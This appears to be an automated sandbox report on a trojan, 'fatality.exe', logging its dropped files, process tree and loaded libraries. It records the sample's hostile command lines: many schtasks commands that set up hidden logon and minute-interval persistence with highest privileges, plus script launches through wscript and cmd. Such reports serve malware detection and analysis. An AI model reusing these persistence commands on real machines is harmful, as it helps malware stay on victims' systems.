                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: smss.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: Idle.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: fatality.exe .0.drStatic PE information: Section: ZLIB complexity 0.997276135089686
                                      Source: fatality.exe .0.drStatic PE information: Section: ZLIB complexity 0.9945203993055556
                                      Source: fatality.exe .0.drStatic PE information: Section: cheat ZLIB complexity 0.9969160071699135
                                      Source: explorer.exe, explorer.exe, 00000008.00000000.1815639732.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, explorer.exe, 0000000E.00000000.1826039246.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, explorer.exe, 0000000E.00000002.1829239210.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, fatality.exe, icsys.icn.exe.0.drBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: explorer.exe, 00000003.00000002.2940280055.000000000041B000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: lH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: fatality.exe, 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.1733290876.000000000041B000.00000004.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000004.00000002.1726389745.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000007.00000002.1726160837.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 0000000E.00000002.1829396733.000000000041B000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: llH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@56/42@3/3
                                      Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00410180 __vbaChkstk,__vbaStrCopy,__vbaAryConstruct2,__vbaOnError,CreateToolhelp32Snapshot,__vbaSetSystemError,__vbaRecUniToAnsi,Process32First,__vbaSetSystemError,__vbaRecAnsiToUni,#525,__vbaStrMove,__vbaSetSystemError,__vbaGenerateBoundsError,__vbaStrToAnsi,K32GetModuleFileNameExA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,#616,__vbaStrMove,__vbaStrMove,__vbaFreeStr,__vbaLenBstr,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaInStr,__vbaFreeStrList,__vbaRecUniToAnsi,Process32Next,__vbaSetSystemError,__vbaRecAnsiToUni,CloseHandle,__vbaFreeStr,__vbaAryDestruct,__vbaFreeStr,__vbaFreeStr,0_2_00410180
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: c:\users\user\desktop\fatality.exe Jump to behavior
                                      Source: C:\blockcomSession\smss.exeMutant created: NULL
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                                      Source: C:\blockcomSession\containerReview.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7CFA9E15FE517528.TMPJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: sfxname1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: sfxstime1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: STARTDLG1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: fatality.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\Users\user\Desktop\fatality.exe File read: C:\Windows\win.iniJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                      Source: fatality.exeReversingLabs: Detection: 97%
                                      Source: fatality.exeString found in binary or memory: <Module>{B88D4D76-330A-4D76-ADDC-F680C30484D3}
                                      Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Users\user\Desktop\fatality.exeJump to behavior
                                      Source: unknownProcess created: C:\Users\user\Desktop\fatality.exe "C:\Users\user\Desktop\fatality.exe"
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Users\user\Desktop\fatality.exe c:\users\user\desktop\fatality.exe
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                                      Source: C:\Users\user\Desktop\fatality.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: unknownProcess created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe "C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\blockcomSession\Idle.exe C:\blockcomSession\Idle.exe
                                      Source: unknownProcess created: C:\blockcomSession\Idle.exe C:\blockcomSession\Idle.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                      Source: unknownProcess created: C:\blockcomSession\smss.exe C:\blockcomSession\smss.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\blockcomSession\smss.exe C:\blockcomSession\smss.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                      Source: C:\blockcomSession\containerReview.exeProcess created: unknown unknown
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: version.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: shfolder.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: dxgidebug.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: rsaenh.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: dwmapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: riched20.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: usp10.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: msls31.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: iconcodecservice.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windowscodecs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: policymanager.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: msvcp110_win.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: pcacli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: mpr.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ktmw32.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ntmarta.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wbemcomn.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: amsi.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: userenv.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: propsys.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: dlnashext.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wpdshext.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: edputil.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: urlmon.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: iertutil.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: srvcli.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: netutils.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wintypes.dll
